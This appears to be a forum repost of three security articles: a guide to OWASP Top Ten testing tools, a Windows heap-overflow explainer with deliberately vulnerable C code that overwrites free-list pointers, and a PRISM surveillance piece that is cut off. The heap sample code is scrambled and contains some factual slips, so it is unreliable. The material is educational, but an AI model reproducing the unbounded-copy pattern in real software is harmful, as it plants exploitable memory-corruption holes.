Control[/TD] [TD]OpenVAS[/TD] [/TR] [TR] [TD]A8: Cross-Site Request Forgery (CSRF)[/TD] [TD]Tamper Data (Samurai WTF), WebScarab or ZAP[/TD] [/TR] [TR] [TD]A9: Using Components with Known Vulnerabilities[/TD] [TD]OpenVAS[/TD] [/TR] [TR] [TD]A10: Unvalidated Redirects and Forwards[/TD] [TD]ZAP[/TD] [/TR] [/TABLE] Those of you who read Russ McRee’s 2010 Top Ten security tools article will notice that most of the tools listed here were also identified in his 2010 survey. However, my approach differs from McRee’s in terms of breadth; whereas McRee aimed to provide a different tool for each of the top ten items, I aim to provide you with a smaller number of tools that should cover most of the top ten so you can concentrate your efforts on mastering fewer tools that do more. Along those lines, it is worth noting that several of my recommended tools, notably the Zed Attack Proxy (ZAP) and new entrant OpenVAS, have increased the breadth of their services to cover more Top Ten items since their original release. In fact, it may be worth taking a closer look at additional capabilities of any recommended tool on this list because many of these tools are still under active development. (For example, WATOBO now has a SQL injection probe, although I haven’t explored it far enough to recommend it yet.) [h=1]Two Main Types of Web Vulnerability Tools[/h] If you scan the chart you will notice that two tools are mentioned the most: OWASP’s Zed Attack Proxy (ZAP) and OpenVAS. These two tools represent two different classes of application scanning that every security researcher should familiarize his or herself with. First, there are the tools that look for common misconfigurations and outdated software, including default settings, sample content, insecure configurations, and old versions that harbor known vulnerabilities. These tools are represented in the chart above by OpenVAS, an open source project with several heavyweight sponsors including the government of Germany. Similar tools include Tenable’s Nessus and eEye’s Digital Security Retina, and perhaps about two dozen more actively development open source projects and commercial products. Second, there are the tools that help dig into specific web applications by automating SQL injection, authentication, session, XSS, directory traversal, redirect and other probes for common and serious vulnerabilities. These tools are represented in the chart above by ZAP. Most of these tools, including ZAP, use a combination of a local web proxy, web session recorder, web playback and thousands of variations on input manipulation to look for vulnerabilities. Similar tools include HP WebInspect, IBM AppScan (originally by WatchFire), dozens of other general-purpose web vulnerability scanners and hundreds of specific case utilities. [h=1]Other Web Vulnerability Tools[/h] In addition to these two main types of tools, most security practitioners will find themselves drawn to additional tools that allow them to dig further into certain classes of vulnerabilities. For example the “other tools” in my list were selected to cover areas where I worried about the thoroughness of my main tools, or where I wanted a second pair of eyes because of the risk. Your list of “other tools” will vary depending on the specific capabilities of your main tools, the needs of your clients or employer, your available operating systems and many other factors, but I selected mine for a few specific reasons. SQL Inject Me for #1 Injection – Although ZAP covers this, I selected a second tool to give me a second pair of eyes on this most common and deadly of vulnerabilities. (I never want to be caught with my pants down on OWASPs’ #1 vulnerability). HTTP Directory Traversal Scanner and Burp Suite for #4 Insecure Direct Object References – Although ZAP also covers this item, I like the breadth of scan and the output provided by either of these tools much more than ZAP’s breadth and output. WATOBO for #5 Security Misconfiguration – This is the highest-rated item that known vulnerability scanners like OpenVAS can detect. I wanted a second pair of eyes to make sure I am detecting more configuration issues, and to get a second opinion on questionable detects. Qualys SSL Server Test for #6 Sensitive Data Exposure – This could be my most controversial recommendation, but having dealt with the innards of SSL/TLS while developing several security products (including the FIPS 140 validation process with three different companies). I always feel like I have an incomplete picture of my SSL/TLS capabilities until I hit my app with Qualys’s SSL Server Test. None of the other local tests I’ve found (or written on my own) have quite the breadth of this hosted test. Tamper Data (Samurai WTF) and WebScarab for #8 Cross-Site Request Forgery (CSRF) – CSRF vulnerabilities can be surprisingly hard to pin down, because what often looks like a detect turns out to be false positive, and what looks like a clean access denial often really changes something interesting on the backend. To chase these vulnerabilities down (to the point where they are reproducible) you usually need to master a local web proxy that can help you manipulate specific fields. Two of the best are Tamper Data and WebScarab, and you will often find yourself switching to your favorite proxy after your main tool registers an initial detect. (Yes, I know ZAP is also a proxy, but it’s not my favorite proxy; it’s my favorite detector.) One other tool that web security practitioners should be familiar with is OWASP’s WebGoat package. This tool isn’t a scanner, probe or proxy: instead, WebGoat is an intentionally insecure web application that we can probe with these and other web security tools. [h=1]Specific Web Vulnerability Applications (Main Tools)[/h] [h=2]Deep Probe Into Specific Applications: OWASP’s Zed Attack Proxy (ZAP)[/h] (Probes for Cross-Site Scripting, Injection, Sessions, Directory Traversal, Unvalidated Redirects and Forwards, and acts as a web proxy to locate CSRF and similar vulnerabilities.) OWASP has recently sponsored the development of its own web application vulnerability scanner called the Zed Attack Proxy (or ZAP for short). It automatically spiders a target URL and looks for common vulnerabilities, especially issues with cookies, headers and cross-scripting. [h=3]Installing and Running Zed Attack Proxy[/h] Download and install the program from http://code.google.com/p/zaproxy/downloads/list Run the program from your Start menu When prompted, use the wizard to create an “SSL root certificate” Type in the URL of a target application in the “URL to attack” field on the “Quick Start” tab To avoid unwanted attention until you know what you’re doing, please stick to “http://localhost” URLs, such as your local copy of WebGoat Much of the power of ZAP comes from using it as an “inline” proxy rather than as an interactive application. To try this mode: Open “Tools | Options | Local proxy” and set the proxy port to an acceptable value (8080 is the default, but if you’re running multiple proxies and web applications on your local machine, things can get a little crowded). Open your web browser and set its proxy settings to “localhost” and port 8080 (or whatever you configured). Browse to a few sites in the web browser. Flip back to ZAP. Notice that the sites you visited (and a few referenced through advertisements and inclusions) are now listed in ZAP’s “Sites” list. Click the “History” tab in the lower half of ZAP. This will show the URLs that caused content to be added to ZAP’s “Sites” list. Once you have started to gather URLs in your sites list, you can expand, gather more information about or actively attack them. In the “Sites” tab, find a URL of a web page that you recognize on a site that you know has more content. Select it and then click the “play” icon on the “Spider” tab at the bottom of the screen to follow the links on the page. To look for SQL Injection or XSS vulnerabilities in a page, select the URL in the “Sites” tab and right-click it to list “Attack” options. To set your attack options (e.g. to just check for XSS and avoid SQL injection attacks), select “Analyse | Scan Policy…” to turn various tests on and off. [h=2]Bad Configuration and Old Software Scanner: OpenVAS[/h] (Probes for Security Misconfiguration, Missing Function Level Access Control, Using Components with Known Vulnerabilities.) I took my original formal security training in the late 1990s so I “grew up” on Nessus when it was still a free security scanning application. Since its switch to a commercial application, a handful of forks of the original Nessus code have carried on Nessus’s original promise of a free remote security scanner. My favorite alternative to Nessus these days is the OpenVAS project, which counts among its backers the national government of Germany. As noted in my chart above, this project is best at finding security misconfigurations, missing function level access controls (formerly known as “failure to restrict URL access”) and components with known vulnerabilities. It includes some SQL injection and other probes to test application input, but since it is mainly designed to scan networks for machines with bad configuration and outdated software, I think you should use it the same way. Installing and Running OpenVAS The OpenVAS software is available for several popular Linux distributions including CentOS, Fedora and Red Hat Enterprise Linux. It is also available on virtual appliances for Oracle VirtualBox and EMC VMware. Once installed, a web-based interface is available to guide you through the scanning process. You’ve likely seen the types of reports that this application generates before: rating findings by severity, and ranking multiple machines from least secure to most secure depending on the number and severity of findings on each machine. For more information, please see: http://www.openvas.org/ [h=1]Other Top Ten Web Application Vulnerabilities Utilities[/h] [h=2]Injection Utility: Security Compass’s SQL Inject Me[/h] Even if you have moved to Chrome or Safari for your daily web browsing, it’s hard to give up Firefox entirely because of its extensive library of add-ons. One of the best SQL injection tools available today is a Firefox add-on called “SQL Inject Me” from Security Compass. [h=3]Installing and Running SQL Inject Me[/h] Install and run the latest version of Firefox (I am currently using v20). Install the add on from: https://addons.mozilla.org/En-us/firefox/addon/sql-inject-me/ After installing the SQL Inject Me plug-in, follow these directions to use it: Navigate to the page or application you want to test. Right-click on the target page and select “Open SQL Inject Me Sidebar”. Once the side-bar is open, use the drop-down and buttons to perform specific attacks. [h=2]Advanced Web Proxy and CSRF Utility: OWASP WebScarab[/h] OWASP’s WebScarab is a Java-based web proxy that displays and allows you to manipulate the specific fields that are passed between browser and server. It is highly extensible, but you often need to know what you want to chase after and how to code to chase it with this tool. Further muddying this project is the fact that a “next generation” edition was started but has not been touched since 2011. For more information, please see: https://www.owasp.org/index.php/WebScarab_Getting_Started or https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project [h=2]Insecure Direct Object Reference Utility: Burp Suite[/h] In 2010, Russ McRee’s 2010 security tools article went into detail about how to use the Burp Suite to ferret out path and directory traversal issues. Path and directory traversal issues have been problematic for web servers and web applications since their inception, perhaps most famously in the 2000 IIS vulnerability that fed worms such as Nimda. Rather than repeat McRee’s work with Burp Suite, I will just agree that Burp Suite is good. For more information, please see: http://portswigger.net/burp/ [h=2]Insecure Direct Object Reference Utility: HTTP Directory Traversal Scanner[/h] Another tool that I like for directory traversal issues is the free HTTP Directory Traversal Scanner by John Leitch, an independent application security consultant in Michigan. This tool scans a given URL about ten thousand URL variants in an attempt to find a named file. It helpfully groups its results by return code and content, which makes it easy find needles in haystacks. For more information, please see: http://www.autosectools.com/Page/HTTP-Directory-Traversal-Scanner [h=2]Security Misconfiguration Utility: WATOBO[/h] Russ McRee’s 2010 security tools uses WATOBO to look for security misconfiguration issues and the tool is still a good choice: it’s open source and maintained by an active community. For more information, please see: http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Main_Page [h=2]Sensitive Data Exposure Utility: Qualsys SSL Server Tester[/h] I normally avoid web-based tools for application scanning for several reasons: the data may not just be reported back to me, they might be pulled or changed at any time and they need to hit an Internet-facing application. However, I recommend Qualsys’s SSL Server Tester page to test the quality of your web application’s HTTPS connection before and after deployment into production. Qualsys tests for basic quality issues such as whether your server supports SSL 2.0, which ciphers are supported, and the strength of your server certificate. It also tests more advanced quality measures such as whether or not client-initiated renegotiation is allowed and whether or not the BEAST attack would be mitigated. For more information, please see: https://www.ssllabs.com/ssltest/index.html (This is a resource hosted by a third party. For maximum protection, only allow traffic from “ssllabs.com” to the target resource until the necessary issues are resolved.) [h=2]CSRF Utility: Tamper Data (Samurai WTF)[/h] A Tamper Data utility is available in the Samurai WTF collection and is part of Russ McRee’s coverage of CSRF utilities in his 2010 security tools review. The “Tamper Data” plug-in for Firefox is not currently recommended because of ongoing stability issues with recent versions of Firefox. Instead, I currently recommend configuring Firefox (or Chrome or any other web browser) to use a web proxy such as WebScarab or ZAP, and then use the functions within the web proxy to manipulate individual cookies, headers, form fields and URLs. [h=2]WebGoat: The Perfect Target[/h] In addition to the top ten web vulnerability list, OWASP develops and distributes software that allows students and security professionals to practice their skills against a deliberately insecure web application. The name of OWASP’s tilting dummy is “WebGoat,” and it is available in both .NET and Java editions. [h=3]How to Download, Install and Set Up WebGoat on Windows[/h] Although there is a .NET edition of WebGoat available for Windows platforms, I’ll stick with the Java edition in this article because the edition supports Linux and Mac OS platforms in addition to Windows. The Java edition also appears to be the more actively developed applications, as its official ambitions include growing into a security benchmarking platform and a honeypot. [h=3]WebGoat Prerequisites[/h] The Java edition of WebGoat requires Java, of course, and uses Tomcat to provide its web interface. Download and install Oracle Java from http://www.java.com Java Version 1.6 (a.k.a. “Java 6?) is recommended [*] Download and install Tomcat from http://tomcat.apache.org/ Tomcat Version 6 is recommended Tomcat Version 7 is supported but requires additional setup not documented here Once installed, open http://localhost:8080/ to confirm that Tomcat is working Once you confirm the service is working, stop the Tomcat service [h=3]How to Install WebGoat[/h] Download and unzip WebGoat from http://code.google.com/p/webgoat/downloads/list Download the “Zip” file and unpack the contents into a local folder [*] Open your local folder and double-click “webgoat.bat” A Java window labeled “Tomcat” will open and display messages Once the “Server startup in XXXXX ms” message appears, open http://localhost to confirm that you are hitting a live Tomcat application on port 80 Next, test WebGoat by opening http://localhost/WebGoat/attack. Sign on with username “guest” and password “guest” when prompted. [h=3]How to Run WebGoat[/h] Start WebGoat by opening http://localhost/WebGoat/attack. Sign on with username “guest” and password “guest” when prompted. Click the “Start WebGoat” button. Sursa: InfoSec Institute Resources – OWASP Top Ten Testing and Tools for 2013

[h=1]Heap Overflow: Vulnerability and Heap Internals Explained[/h]ViperEye June 26, 2013 1. Introduction A heap overflow is a form of buffer overflow; it happens when a chunk of memory is allocated to the heap and data is written to this memory without any bound checking being done on the data. This is can lead to overwriting some critical data structures in the heap such as the heap headers, or any heap-based data such as dynamic object pointers, which in turn can lead to overwriting the virtual function table. Here we’ll see some details about the inner working of the Windows heap, then move on to discuss how heap overflow vulnerability occurs. The paper will start with basic information on how Windows heap management is done and then move to understanding the vulnerability. 2. Windows Heap Basics Windows has two kinds of heap: Default heap Dynamic heap The default heap is used by the win32 subsystem to manage and allocate memory for local and global variables and local memory management functions [malloc()]. The dynamic heap is created by functions such as HeapCreate() that return a handle/address to a memory chunk that contains the heap header; the information in this header includes the segment table, virtual allocation list, free list usage bitmap, free list table, lookaside table, etc. This data is used by heap allocation functions such as HeapAlloc(), HeapReAlloc(), which allocates memory from this particular heap. As we can see from the above image, PEB stores the details of the heaps initialized in the system. This can be useful in enumerating heaps in the system. The above image shows the structure of the heap header. Next we will take a look at some of the important data structures in the heap that will help us understand the heap exploit better. [TABLE] [TR] [TD]..[/TD] [/TR] [TR] [TD]Segment List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]Virtual Allocation List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]Free List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]Pointer to Lookaside List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [/TABLE] The condition where the heap is not used is when the allocation chunk is greater than 512KB (4096 bytes); in this case, the allocation is done in virtual memory by VirtualAlloc(). Let’s see how this happens: The above image shows how the heap allocation is done; certain constraints are verified before passing it forward. As we can see, all the calculation is done based on dividing by 8, the size of the allocated block is always divisible by 8, and we can also conclude from the code that there cannot exist a block of size 8 bytes because the header itself will amount to 16 bytes. Here’s the decision path during the heap allocation process: If block size is greater than 1024 bytes, go to step2. If it is less than 1024 bytes, check the lookaside list if there are no free entries check free list. If the above condition is true, then check whether the memory to be allocated is greater than 0xFE00 (512 KB). If the above condition is not true, then the memory is allocated from the free list. [*] If the above condition is true, then check whether the heap was created with a fixed size; if true, and then throw an error (STATUS_BUFFER_TOO_SMALL) 0xC0000023. If not true, use ntdll.ZwAllocateVirtualMemory to allocate new memory. Now’s let’s look at how heap memory is freed; memory is freed based on whether it is in the default heap or the dynamically allocated heap. If the buffer is in default heap then: Try to free lookaside list. Or coalesce buffer and place it on free list. If it is virtually allocated: Remove from busy list Or free it to OS. Free buffer to lookaside happens only if: There is a lookaside table Lookaside is not locked Requested size is smaller than 1024 (to fit the table) Lookaside is not “full” yet. If buffer can be placed on lookaside, keep the buffer flags set to busy and return to caller. The other option is to coalesce and place in free buffer. This happens only if the buffer can’t be freed to lookaside. The conditions where coalesce fails: Freed buffer flags & 0×80 is true Freed buffer is first ? no backward coalesce Freed buffer is last ? no forward coalesce Adjacent buffer is busy The total size of two adjacent buffers is bigger than the virtual allocate threshold (0xFE00 * 8 bytes == ~64k) Insert to free list if: Coalesced block size < 1024 insert to proper free list entry. Coalesced block size > De-commit threshold and total heap free size is over De-commit total free threshold, then De-commit buffer back to the OS. Coalesced is smaller than virtual allocate threshold, insert the block into free list [0]. Coalesced block is bigger than virtual allocate threshold, break the buffer into smaller chunks, each one as big as possible, and place them on free list [0]. Heap Overflows Let`s take a look at this rather simple example of a vulnerable function: DWORD vulner(LPVOID str) { LPVOID mem = HeapAlloc(h, 0, 128); // strcpy(mem, str); // return 0; }HANDLE h = HeapCreate(0, 0, 0); // default flags As we can see, here the vulner() function copies data from a string pointed by str to an allocated memory block pointed at by buf, without a bound check. A string larger than 127 bytes passed to it will thereby overwrite the data coincidental to this memory block (which is, actually, a header of the following memory block). The lookaside list has two pointers pointing to the lookaside entries before and after it, called the FLINK and BLINK pointers. The layout for a single lookaside entry is given below: So, when an overflow occurs, we can overwrite the FLINK and BLINK pointers. Now let’s modify the above code: { HANDLE h = HeapCreate(0, 0, 0); LPVOID m1 = HeapAlloc(h, 0 , 64); LPVOID m2 = HeapAlloc(h, 0,128); HeapFree(m1); HeapFree(m2); // The above steps place the buffers in lookaside list LPVOID m1 = HeapAlloc(h, 0 , 64); // This sets up the memory for overwrite into adjacent memory blocks memcpy((char *)m, 0x31, 64+16); m2 = HeapAlloc(h, 0, 128-8); // strcpy(mem, str); // return 0; }DWORD vulner(LPVOID str) From the above code we can see that we have allocated two memory chunks and then freed them to the lookaside list; as mentioned above, any memory below 1024-8 bytes will be sent to the lookaside list. After that, an allocation of 64 bytes is done again. This will move the memory back to the busy list. But, in this case, the memory of 128 bytes will still be right next to the 64-byte chunk, so if we overflow the 64-byte chunk the data will write into 128-byte chunk. In the next line we are overwriting with 64+16 bytes of data which will overwrite the header and the FLINK, BLINK pointers of the 128 byte block. This is shown in the image below: Click to Enlarge The whole process of unlinking is shown below: Entry2?BLINK?FLINK = Entry2?FLINK Entry2?FLINK?BLINK = Entry2?BLINK So now, when the 128-byte buffer is allocated, it has already corrupted FLINK and BLINK pointers. This can be in an attacker’s control. So the entry “Entry2?BLINK?FLINK” will be in an attacker-controlled memory location; this can be overwritten with the value of Entry2?FLINK, which is also attacker-controlled. Conclusion This paper simply gives an understanding of the heap overflow process. The next article will give the details about how this vulnerability can be exploited. Sursa: InfoSec Institute Resources – Heap Overflow: Vulnerability and Heap Internals Explained

[h=1]PRISM – Facts, Doubts, Laws and Loopholes[/h]Pierluigi Paganini June 24, 2013 [h=1]Introduction[/h] Edward Snowden is the name of a 29-year-old technical assistant for the Central Intelligence Agency who disclosed the largest surveillance program implemented by the US known as the PRISM program. For better or for worse, his name is destined to enter into history. The Guardian identified Edward Snowden as a technical assistant who worked for US Intelligence at the National Security Agency for the last four years for various defense contractors. Currently he is an employee of security defense contractors Booz Allen Hamilton. Snowden decided to reveal his identity because like other whistleblowers, such as Bradley Manning, the US Army soldier who was arrested in May 2010 in Iraq on suspicion of having passed classified material to the website WikiLeaks, he decided to make public an uncomfortable truth. The disclosure started with the publication of the secret court order to Verizon Communications, but it was just the tip of the iceberg. All of the principal US IT companies support the surveillance program PRISM despite their high managements denying it. The surveillance architecture monitors every activity on the Internet, and it has been ongoing for many years. Through it the US Government has obtained access to user’s data, and private companies like Microsoft, Google, Facebook and Apple are all involved. Edward Snowden feared that the government will persecute him for disclosing Top Secret documentation on the extensive massive surveillance program PRISM. While I’m writing this, he is in a hotel in Hong Kong, where he flew after the publication of the presentation he prepared during his work in the NSA Office in Hawaii, around three weeks ago. Snowden decided to publish the history and proof of a program that every US citizen imagined but that authorities and private companies always denied. He left the US citing health reasons and flew to Hong Kong, the Chinese territory known also for its “strong tradition of free speech.” According to the interview released to The Guardian, Edward Snowden is concerned, as he knows very well the power of intelligence agencies and the ramifications of his actions. He has thus barricaded himself in a hotel. “I’ve left the room maybe a total of three times during my entire stay.” “I have no intention of hiding who I am, because I know I have done nothing wrong.” “I could be rendered by the C.I.A., I could have people come after me.” “We’ve got a C.I.A. station just up the road in the consulate here in Hong Kong, and I’m sure,” “that they’re going to be very busy for the next week, and that’s a fear I’ll live under for the rest of my life,” Snowden said. The confirmation of the existence of a PRISM program has shocked public opinion. Associations for the defense of freedom of expression and human rights are concerned about the violation of the citizens’ privacy, even if it is for homeland security reasons. The Obama administration is defending the surveillance program, saying it is necessary to prevent terrorist plots, and that the debated data collection has already allowed the prevention of terrorist acts. “Nobody is listening to your telephone calls. That’s not what this program is about.” “In the abstract you can complain about Big Brother and how this is a potential program run amok, but when you actually look at the details, I think we’ve struck the right balance.” “You can’t have 100 percent security and also then have 100 percent privacy and zero inconvenience.” “We’re going to have to make some choices as a society. … There are trade-offs involved.” These are what the President told journalists during a visit to California’s Silicon Valley. Edward Snowden considers himself as a patriot, having served his country as a soldier in Iraq and recently working as a contractor for the CIA overseas. He declared that he has carefully considered his actions and its possible consequences to the population, but nothing could be worse than what he witnessed. He carefully evaluated the documents he disclosed to ensure no people would be harmed and that the public interest would be served. “Anybody in positions of access with the technical capabilities that I had could, you know, suck out secrets to pass them on the open market to Russia.” “I had access to the full rosters of everyone working at the NSA, the entire intelligence community and undercover assets all around the world — the locations of every station we have, what their missions are.” “If I had just wanted to harm the U.S., you could shut down the surveillance system in an afternoon.” President Obama is in the eye of the storm. He was syndicated by some members of Congress despite the revelation announced by The White House that the administration has played at least 13 briefings to Congress to show the surveillance program operated by the NSA. [h=1]The Fact – The PRISM Program[/h] The Washington Post and the Guardian were the first newspapers to publish the news of the US machine for surveillance works. The NSA and FBI systematically access user information from central servers of the leading IT. The list revealed , despite the beliefs of many security experts, that the extension of the monitoring network is larger: AOL Apple Dropbox Facebook Google PalTalk Skype Yahoo You Tube The surveillance project began in 2007 and was supported by the Bush administration. It was known as PRISM and is capable of acquiring sensitive information from IT majors and then operating complex analysis activities. The Washington Post published an article on the PRISM program reporting the top secret documents disclosed in Snowden’s presentation. They revealed that PRISM has been referred at least 1,477 times during government briefings on Homeland Security. The document states that PRISM became popular during the Arab Spring when it was used to profile individuals considered dangerous for the US. The 41 slides composing the presentation, classified as Top Secret, claim that the “collection directly from the servers” of major US IT service providers remarks the need for the information for security purpose. The Guardian has verified the authenticity of the PowerPoint presentation that is circulating on the Internet. It is classified as top secret, with no distribution to foreign allies, and was apparently used to train operatives. “Information collected under this program is among the most important and valuable foreign intelligence information we collect, and is used to protect our nation from a wide variety of threats. The unauthorized disclosure of information about this important and entirely legal program is reprehensible and risks important protections for the security of Americans,” Director of National Intelligence James R. Clapper said. All the companies reported in the Top Secret document denied any knowledge of the secret program, following principal comments on the disclosure: “Google cares deeply about the security of our users’ data. We disclose user data to government in accordance with the law, and we review all such requests carefully. From time to time, people allege that we have created a government ‘back door’ into our systems, but Google does not have a back door for the government to access private user data,” stated Google. “We do not provide any government organization with direct access to Facebook servers,” “When Facebook is asked for data or information about specific individuals, we carefully scrutinize any such request for compliance with all applicable laws, and provide information only to the extent required by law,” declared Joe Sullivan, Chief Security Officer for Facebook. “We have never heard of PRISM,” “We do not provide any government agency with direct access to our servers, and any government agency requesting customer data must get a court order,” said Steve Dowling, a spokesman for Apple. [h=1]Is the PRISM Program Legal? Law and Regulations[/h] The digital exposure of Internet users has reached a level unthinkable until a few years ago. This aspect has had mainly positive effects but it has also increased the surface of attack for each individual. We are all exposed to serious privacy risks, especially as legislation has struggled to keep up. The number of laws that are trying to regulate our digital existence is increasing. There is a need to reduce the gaps in legislation and enforcement that open you up to online data breaches, stalking, identity theft and disclosure of user’s personal information. It must be considered that these laws can have a major impact on our life; every ordinary operation could be started with something simple such as a phone call. Analyzing the US legal model, we can recognize the different areas in which such laws are trying to regulate technology introduction, following a short list: [h=3]Digital Life[/h] Laws and proposals are designed to protect user’s privacy in the online and mobile spheres. The Protecting Children from Internet Pornographers Act of 2011 was designed to increase the enforcement of laws related to child pornography and child sexual exploitation. The Electronic Communications Privacy Act is almost 30 years old, so it is likely going to see some major revisions to reflect the increased variety and prevalence of electronic communications. The original act was designed to help expand federal wiretapping and electronic eavesdropping provisions, as well as to protect communications that occur via wire, oral, and electronic means and to balance the right to privacy of citizens with the needs of law enforcement. The Children’s Online Privacy Protection Act or COPPA protects children under 13 from the online collection of personal information. The GPS Act is a proposal to give government agencies, commercial entities, and private citizens specific guidelines for the use of geolocation information. [h=3]Digital Commerce[/h] The massive introduction of technology in commerce has requested the definition of strict laws to avoid the abuse of information on consumer habits and activities. Following is a list of laws that seek to address a number of major issues related to consumer privacy rights: The Commercial Privacy Bill of Rights establishes a baseline code of conduct for how personal information can be used, stored, and distributed. The Application Privacy, Protection, and Security Act of 2013 was designed to address concerns with the data collection being done through applications on mobile devicesand would require that app developers provide greater transparency about their data collection practices. The Location Privacy Protection Act of 2011 addresses the risks for stalking posed by cell phones loaded with GPS and apps that gather information about a user’s location. The Cyber Intelligence Sharing and Protection Act (CISPA) is designed to allow government investigation of cyber threats sharing of Internet traffic information between the US government and IT and manufacturing companies. [h=3]Work and Employment[/h] Laws and regulation that affect users in the workplace during their ordinary activity: Social Media Privacy Act is for the protection of online privacy for job seekers. Genetic Information Nondiscrimination Act of 2008 prohibits the use of genetic information in health insurance and employment. [h=3]Personal Information[/h] No doubt, the most important set of laws and regulations are those that address issues of personal information, including medical data, private phone conversations, and video watching history. The Foreign Intelligence Surveillance Act (FISA)Amendments Act of 2008/FISA Amendments Act Reauthorization Act of 2012 passed in 1978 but has undergone some major restructuring in recent years. It proscribed basic procedures for physical and electronic surveillance and the collection of foreign intelligence information. It also provides strict judicial and congressional oversight of any covert surveillance activities. It has been modified several times; the first time under the Patriot Act expired in 2008. The U.S. Senate voted in December 2012 to extend the FISA Amendments Act through the end of 2017.Under this act, the US Government is authorized to conduct surveillance of Americans’ international communications, including phone calls, emails, and Internet records, exactly what is addressed by the PRISM program. These orders do not need to specify who is being spied on or the reasons for doing so. It is now possible for government agencies to collect information on any foreign communications, which many individuals and privacy protection groups have consistently argued is a gross violation of privacy and civil liberties. The Health Information Technology for Economic and Clinical Health (HITECH) Act requires that major security breaches be reported to Health and Human Services as well as the media. It increases enforcement of HIPAA and the resulting penalties and ensures that any individual can request a copy of his or her public health record. Most importantly, it expands HIPAA regulations to include any business associates or providers to medical facilities, requiring vendors of any kind to keep private records private. The Video Privacy Protection Act was designed to prevent the disclosure of audio/video materials, with respect to the original proposal it has been integrated with social media sites. The Protect Our Health Privacy Act of 2012 requires health providers to encrypt any mobile device containing health information, restrict business associates’ use of protected health information, improve congressional oversight of HIPAA, and provide additional measures that would protect patient privacy and safety when using health information technology. [h=3]Back to the PRISM Case[/h] After the analysis of principal laws and proposals, users can have a clearer idea on what governments are allowed to do to ensure homeland security. The US PRISM program seems to be allowed by “Section 215 of the Patriot Act, which authorizes the existence of special procedures, authorized by the FISA court to force U.S. companies to deliver assets and records of their customers, from the metadata to confidential communications, including e-email, chat, voice and video, videos and photos”. It expands the law enforcement power to spy on every US citizen, including permanent residents, without providing explanation, starting the investigation on the exercise of First Amendment rights. Those who are the subjects of the surveillance are never notified of ongoing activities. Law enforcement could keep track of every activity made by a suspect, including communication and Internet activities. Many citizens and lawyers can consider Section 215 un-constitutional, claiming that it violates the Fourth Amendment by allowing the government to effect Fourth Amendment searches without a warrant and without showing probable cause. Section 215 might be used to obtain information that affect privacy interests other than those protected by the First Amendment, but let’s think to medical records. Also the Fourth and Fifth Amendments are violated by provision of such data by failing to require that those who are the subject of Section 215 orders be told that their privacy has been compromised. [h=1]The Outsourcing of Intelligence: Risks and Benefits[/h] The recent data leak on US Top Secret program PRISM by an intelligence contractor raised a debated discussion on the introduction of outsourcing for personnel to hire for top-secret programs. It was an inevitable consequence of the growth of the security sector and of the increased number of tasks needed by governments to ensure homeland security and the security of principal productive sectors. Edward Snowden has worked at Booz Allen Hamilton and other intelligence contractors. His career started at the Central Intelligence Agency with various technical assignments. In an official statement, the company Booz Allen declared, “Booz Allen can confirm that Edward Snowden, 29, was an employee of our firm for less than 3 months, assigned to a team in Hawaii. Snowden, who had a salary at the rate of $122,000, was terminated June 10, 2013 for violations of the firm’s code of ethics and firm policy. News reports that this individual has claimed to have leaked classified information are shocking, and if accurate, this action represents a grave violation of the code of conduct and core values of our firm. We will work closely with our clients and authorities in their investigation of this matter.” Snowden is one of the thousands of private intelligence contractors hired by the US Government to respond to the increased necessity of security to prevent terrorist attacks. The majority of these professionals play critical roles within the principal security agencies in the country. They access confidential information, gather sensitive data on intelligence missions, and work side by side with civil government analysts in accessing a huge quantity of secret and top-secret documents. According to the official reveal of the Office of the Director of National Intelligence, almost one in four intelligence workers were employed by contractors, and around 70% of the intelligence community’s secret budget is spent for outsourcing. The outsourcing of intelligence activities allows better rationalization of the funds designated to ensure homeland security but it also represents a serious risk for the possibility of infiltration of spies and whistleblowers. The AP reported that nearly 500,000 contractors have access to the government’s top secret programs. “Of the 4.9 million people with clearance to access “confidential and secret” government information, 1.1 million, or 21 percent, work for outside contractors, according to a report from Clapper’s office. Of the 1.4 million who have the higher “top secret” access, 483,000, or 34 percent, work for contractors.” In 2007, the former director of Naval Intelligence, retired Rear Adm. Thomas A. Brooks, wrote in a report that contractors assumed a crucial role within the nation’s intelligence infrastructure. “The extensive use of contractor personnel to augment military intelligence operations is now an established fact of life …. It is apparent that contractors are a permanent part of the intelligence landscape,” he said. To give an idea of the number of private contractors that worked for US intelligence agencies, The Post reported that 1,931 private companies worked on reserved counterterrorism operations and many other campaigns to empower homeland. The operations were conducted all over the country in around 10,000 locations. During the last year, the principal emergency was related to the increased number of cyber attacks, both sabotage and cyber espionage campaigns, against National networks. The massive introduction of technology has made necessary the recruitment of a large number of technicians who have been entrusted with the delicate task of protecting the country’s infrastructure such as communication networks, grids, and satellite systems. A recent trend that emerged to respond to continuous cyber attacks is the involvement in offensive operations of skilled professionals and hackers hired to instruct cyber units. These same hackers have been used to perform vulnerability assessments and penetration testing on critical infrastructures. [h=1]The Risk of Cyber Attacks on the US Massive Surveillance System[/h] One of the most alarming risks related to a Top Secret program such as PRISM is represented by the possible disclosure of the information gathered. Unauthorized access to the information could give a foreign government a meaningful advantage in terms of intelligence. Foreign hackers could have access to a huge quantity of sensitive information centralized and concentrated in a single vulnerable architecture. It must be considered that a possible attack could be taken advantage of by insiders and cyber spies. The case of Bradley Manning proved to the public opinion the devastating effect that the revelation of the government’s secret documents could have on homeland security. Starting with the consideration that nearly 854,000 people ordinarily manage top-secret security clearances, it is to understand the surface of attacks for the “machine” of Intelligence. Each of these individuals could be a target for state-sponsored hackers and could itself represent an insider threat. The disclosure of the PRISM program is a demonstration that principal US intelligence agencies and law enforcement weren’t able to protect Top Secret information from disclosure. The information has been acquired by a journalist thanks to a spontaneous revelation, but it must be considered that many other Top Secret programs could be affected by cyber espionage operations by foreign governments. “The access to PRISM information could enable blackmail on a massive scale, widespread manipulation of U.S. politics, and industrial espionage against American businesses.” If persistent collectors such as the Chinese government or a hostile country like Iran or North Korea could have access to a surveillance system, it could be a tragedy for the country. Suddenly the country will have no secret for the adversary, and every sector will be deeply impacted. Foreign governments aren’t unique in their interest in access to the surveillance system. Terrorists belonging to groups like Al Qaeda and also cyber criminals could breach the defense of Intelligence archives. The development and 